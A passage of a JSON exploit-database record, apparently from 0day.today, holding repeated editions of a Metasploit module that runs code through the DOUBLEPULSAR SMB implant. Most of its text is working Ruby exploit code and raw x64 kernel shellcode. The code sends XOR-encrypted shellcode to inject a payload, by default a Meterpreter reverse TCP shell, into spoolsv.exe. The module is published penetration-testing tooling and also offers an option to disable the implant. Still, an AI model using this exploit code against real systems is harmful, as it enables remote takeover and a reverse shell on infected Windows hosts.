\"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-07] #"}, "lastseen": "2021-10-06T22:19:02", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e1a5a9c279cbf621bea10a09715a227c", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-08T00:17:28", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", 
"1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:17:28", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-08T00:17:28", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-08] #"}, "lastseen": "2021-10-08T00:17:28", "differentElements": ["sourceData"], "edition": 38}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "a8858b4261ce0948fafb9db666ab4ced", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-08T22:18:55", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", 